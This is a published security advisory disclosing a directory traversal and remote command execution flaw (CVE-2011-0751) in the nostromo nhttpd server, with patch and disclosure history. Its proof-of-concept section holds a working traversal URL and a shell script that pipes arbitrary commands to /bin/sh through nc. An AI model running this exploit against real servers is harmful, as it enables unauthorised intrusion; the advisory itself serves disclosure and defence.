Advisory: nostromo nhttpd directory traversal leading to arbitrary
          command execution

During a penetration test, RedTeam Pentesting discovered a directory
traversal vulnerability leading to arbitrary command execution in the
nostromo HTTP server.


Details
=======

Product: nostromo (nhttpd)
Affected Versions: <= 1.9.3
Fixed Versions: CVS 2011-03-03, 1.9.4
Vulnerability Type: directory traversal
Security Risk: high
Vendor URL: http://www.nazgul.ch/dev_nostromo.html
Vendor Status: patch available
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-001
Advisory Status: published
CVE: CVE-2011-0751
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0751


Introduction
============

nhttpd is a simple, fast and secure HTTP server. It runs as a single
process, handling connections with select(2). For CGIs and directory
listing it does fork(2). nhttpd has the minimum of HTTP/1.1 and CGI/1.1
implemented.

(from the vendor's homepage)


More Details
============

When parsing HTTP requests, nostromo first checks for directory
traversal attempts by searching for /../ in the request URI. However
this check is performed before decoding escaped characters in the URI.
Thus, directory traversal is possible by e.g. escaping the slashes in
../ as %2f.

Unless the chroot feature of nostromo is used, any file in the system
that is readable with the runtime permissions of nostromo can be
accessed.

A peculiarity of nostromo is the handling of CGI scripts. Citing the
manual page, "CGIs are recognized by the file world executable flag".
Therefore, any program or script, that is executable by the system user
nostromo runs as, will be executed when one tries to access it through
directory traversal. Any data received in the body of a HTTP POST
request will be sent to standard input of executed CGI scripts.

By using directory traversal to send a HTTP POST request to /bin/sh, and
providing shell commands in the request body, arbitrary command
execution is possible. Similarly, interpreters of programming languages
that execute program code they receive via standard input, such as perl
or python, can be used to execute arbitrary program code in those
languages.


Proof of Concept
================

The access log of nostromo can be accessed using an URL like this:
http://www.example.org/..%2flogs/access_log

The following simple shell script implements the arbitrary command
execution described above using /bin/sh:

------------------------------------------------------------------------
#!/bin/sh
######################################
#                                    #
#  RedTeam Pentesting GmbH           #
#  kontakt@redteam-pentesting.de     #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

if [ $# -lt 3 ]; then
    echo "Usage: $(basename $0) HOST PORT COMMAND..."
    exit 2
fi


HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
------------------------------------------------------------------------


Workaround
==========

When serving static files, the impact of this vulnerability can be
reduced by using the chroot feature of nostromo. If CGI scripts are
used, any interpreter required for these scripts might allow being
abused as shown above.
The nostromo configuration and log files remain accessible even when
using the chroot feature.


Fix
===

Upgrade to development version from CVS as of 2011-03-03 or version
1.9.4, once released.


Security Risk
=============

As an attacker is potentially able to execute arbitrary commands
remotely, the risk is estimated as high.


History
=======

2011-01-12 Problem identified during a penetration test
2011-01-20 Customer approves contacting vendor
2011-01-26 CVE number requested
2011-01-31 Vendor notified
2011-02-02 CVE number assigned
2011-02-05 Vendor confirmed the vulnerability and sent first patch for
           review
2011-02-10 Vendor sent final patch for review
2011-03-03 Vendor releases fix
2011-03-15 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300
Dennewartstr. 25-27                        Fax : +49 241 963-1304
52068 Aachen                    http://www.redteam-pentesting.de/
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck